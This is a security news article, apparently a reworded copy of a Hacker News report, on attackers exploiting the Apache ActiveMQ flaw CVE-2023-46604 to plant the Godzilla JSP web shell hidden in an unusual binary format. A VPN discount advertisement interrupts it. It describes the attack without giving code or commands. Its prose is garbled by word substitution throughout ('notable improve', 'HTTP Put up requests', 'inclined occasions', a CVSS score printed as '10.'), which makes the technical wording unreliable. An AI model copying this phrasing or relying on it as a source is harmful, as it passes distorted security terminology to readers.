Cybersecurity scientists are warning of a “notable improve” in risk actor activity actively exploiting a now-patched flaw in Apache ActiveMQ to deliver the Godzilla web shell on compromised hosts.
“The web shells are concealed within an mysterious binary format and are created to evade security and signature-centered scanners,” Trustwave mentioned. “Notably, irrespective of the binary’s unfamiliar file structure, ActiveMQ’s JSP engine continues to compile and execute the web shell.”
CVE-2023-46604 (CVSS score: 10.) refers to a severe vulnerability in Apache ActiveMQ that allows distant code execution. Due to the fact its general public disclosure in late Oct 2023, it has occur under energetic exploitation by various adversaries to deploy ransomware, rootkits, cryptocurrency miners, and DDoS botnets.

Protect your privacy by Mullvad VPN. Mullvad VPN is one of the famous brands in the security and privacy world. With Mullvad VPN you will not even be asked for your email address. No log policy, no data from you will be saved. Get your license key now from the official distributor of Mullvad with discount: SerialCart® (Limited Offer).
➤ Get Mullvad VPN with 12% Discount
In the most recent intrusion set noticed by Trustwave, inclined occasions have been targeted by JSP-primarily based web shells that are planted in just the “admin” folder of the ActiveMQ set up listing.
The web shell, named Godzilla, is a features-prosperous backdoor capable of parsing inbound HTTP Put up requests, executing the written content, and returning the success in the type of an HTTP reaction.
“What makes these destructive information especially noteworthy is how the JSP code seems to be concealed within just an unfamiliar kind of binary,” security researcher Rodel Mendrez explained. “This system has the prospective to circumvent security steps, evading detection by security endpoints all through scanning.”
A closer assessment of the attack chain shows that the web shell code is converted into Java code prior to its execution by the Jetty Servlet Engine.
The JSP payload in the long run lets the threat actor to join to the web shell by means of the Godzilla administration consumer interface and get total command above the focus on host, facilitating the execution of arbitrary shell commands, viewing network information, and managing file management functions.
Consumers of Apache ActiveMQ are really advised to update to the most current edition as before long as probable to mitigate prospective threats.
Observed this report attention-grabbing? Abide by us on Twitter and LinkedIn to study extra distinctive information we post.
Some elements of this short article are sourced from:
thehackernews.com